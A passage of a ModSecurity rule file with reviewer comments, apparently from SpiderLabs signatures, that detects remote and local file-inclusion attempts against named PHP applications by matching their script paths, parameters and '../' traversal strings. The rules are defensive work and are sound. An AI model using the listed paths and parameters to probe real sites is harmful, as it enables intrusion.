Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /awcm/includes/window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011948,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
&TX:'/RFI.*ARGS:theme_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM window_top.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# The line above is the last link of the chain for rule 2011948 (started on the
# previous line of the file). In the chains below, the starter matches a path
# fragment in REQUEST_LINE, the next link requires "GET " in REQUEST_LINE, and
# the last link passes when at least one TX variable has a name matching the
# quoted expression; it then adds tx.critical_anomaly_score to tx.anomaly_score.
# Those TX variables are set elsewhere (presumably by the generic RFI rules -
# confirm they are loaded before this file).

# (2011949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /awcm/control/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:lang_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM common.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /awcm/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:theme_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AWCM header.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MassMirror Uploader example_1.php Remote File Inclusion attempt
SecRule REQUEST_LINE "@contains /Base/example_1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS MassMirror Uploader example_1.php Remote File Inclusion attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # NOTE(review): TX:'/.../' is a regular-expression selector, so
    # [MM_ROOT_DIRECTORY] below is read as a character class, not as literal
    # brackets. As written it would not match a TX variable recorded for the
    # parameter GLOBALS[MM_ROOT_DIRECTORY], so this chain does not fire for the
    # parameter it names. The brackets need escaping; check how ModSecurity
    # treats backslashes inside a single-quoted selector before changing it.
    SecRule &TX:'/RFI.*ARGS:GLOBALS[MM_ROOT_DIRECTORY]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MassMirror Uploader example_1.php Remote File Inclusion attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012007) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012007,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:skin_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012008) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt
# Same path as rule 2012007; this chain tests the parameter value for "../"
# instead of looking for an RFI TX variable.
SecRule REQUEST_LINE "@contains /plugins/templateie/lib/templateie_install.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012008,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # The action string of this last link is on the next line of the file.
    SecRule ARGS:skin_file "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpCow skin_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/initsystem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012010,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:loader_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zen Cart loader_file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012013) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_smf/smf.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012013,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo Component com_smf smf.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt SecRule REQUEST_LINE 
"@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012014,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jimtawl" "chain" SecRule ARGS:task "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Jimtawl Component task Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt SecRule REQUEST_LINE "@contains /viewver.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012015,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:doc_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebRCSdiff viewver.php File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012022,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_cbe" "chain" SecRule 
REQUEST_LINE "@contains task=userProfile" "chain"
    # The fragment above and the link below finish the chain for rule 2012022,
    # which starts on the previous line of the file.
    # NOTE(review): the transformations (t:urlDecodeUni, t:htmlEntityDecode,
    # t:normalisePathWin) are listed on chain starters only; the "../" links name
    # none, so what the parameter value is normalised with depends on
    # SecDefaultAction - verify.
    SecRule ARGS:tabname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community Builder Enhenced Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012024) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /gbookmx/gbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012024,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # Passes when at least one TX variable has a name matching the expression;
    # such variables are set elsewhere (presumably by the generic RFI rules -
    # confirm they are loaded before this file).
    SecRule &TX:'/RFI.*ARGS:newlangsel/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gbook MX newlangsel Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /download.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012025,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains filesec=sitemap" "chain"
    SecRule REQUEST_LINE "@contains filetype=text" "chain"
    # NOTE(review): the operand here is "..//" (two slashes), unlike the "../"
    # used by the other LFI links in this file, so the link is narrower than its
    # siblings. Confirm against the upstream signature whether that is intended.
    SecRule ARGS:file "@contains ..//" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Seo Panel file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012031) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012031,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:ABTPV_BLOQUE_CENTRAL/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012032) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /includes/esqueletos/skel_null.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012032,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # NOTE(review): msg says Local File Inclusion, but the last setvar stores the
    # hit under the WEB_ATTACK/RFI key - confirm that is intended.
    SecRule ARGS:ABTPV_BLOQUE_CENTRAL "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Abtp Portal Project skel_null.php Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012033) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt
# The action string of this starter continues on the next line of the file.
SecRule REQUEST_LINE "@contains /modules/login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012033,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS N-13 
News default_login_language Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    # The fragment above closes the starter of rule 2012033 (begun on the
    # previous line of the file); the two links below finish that chain.
    # The "GET " link is a plain substring test on the request line.
    # NOTE(review): the same parameter sent with another method is left to other
    # rules - confirm that coverage exists.
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:default_login_language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS N-13 News default_login_language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012069) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /admin/upgrade_unattended.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012069,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    # No @operator is named, so the operand is a regular expression rather than
    # the "@contains ../" substring test used by the neighbouring chains.
    # NOTE(review): the pattern is written with a doubled backslash before x2f;
    # whether the regex engine receives \x2f ("/") or a literal backslash
    # depends on how the configuration parser unescapes "\\" inside the quoted
    # operand. Verify with a regression test that this link matches "../".
    SecRule ARGS:db_type "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MantisBT db_type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt
# The starter here matches a query fragment (app=urchin.cgi) rather than a
# script path. NOTE(review): msg names session.cgi, which none of the links
# test for - confirm the chain is as specific as intended.
SecRule REQUEST_LINE "@contains app=urchin.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains action=prop" "chain"
    # The action string of this last link continues on the next line of the file.
    SecRule ARGS:gfid "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Google Urchin session.cgi Local File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012122,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012123) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2 SecRule REQUEST_LINE "@contains /modules/maticmarket/deco/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012123,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012124) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/haut.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012124,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-3',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012125) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/blanc/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012125,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-4',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012126) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012126,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-5',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012127) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/default/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012127,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-6',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7 SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/haut.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012128,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-7',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion 
# Attempt-8
SecRule REQUEST_LINE "@contains /modules/maticmarket/bleu/gold/bas.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012129,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:modulename "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MaticMarket modulename Parameter Local File Inclusion Attempt-8',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# --- Review notes for the chains in this part of the file ------------------
# Every chain has the same shape. Link 1 requires REQUEST_LINE to contain the
# application path and declares t:urlDecodeUni, t:htmlEntityDecode and
# t:normalisePathWin; links 2 and 3 declare no transformations of their own.
# Link 2 requires REQUEST_LINE to contain "GET ". The last link tests the
# parameter: either ARGS:<name> contains "../", or &TX:'/RFI.*ARGS:<name>/'
# counts at least one TX variable whose name matches the pattern.
# A full match sets tx.msg, adds tx.critical_anomaly_score to
# tx.anomaly_score and stores the matched value under
# tx.<rule id>-WEB_ATTACK/RFI-<matched variable name>.
# NOTE(review): the &TX form presumably relies on a generic RFI rule having
# stored such a TX variable earlier - confirm the rule files load in that order.
# NOTE(review): link 2 ties each chain to request lines containing "GET ";
# the same parameter sent with another method is left to other rules.
# NOTE(review): the "../" chains also store under the WEB_ATTACK/RFI key
# although their messages say Local File Inclusion - confirm this is intended.
# ---------------------------------------------------------------------------

# (2012130) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /pingsvr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012130,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mybloggie_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS myBloggie mybloggie_root_path Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012165) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /blocks/file/controller.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012165,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45669'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:DIR_FILES_BLOCK_TYPES_CORE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Concrete DIR_FILES_BLOCK_TYPES_CORE Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /com_xmovie/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012166,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_xmovie file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
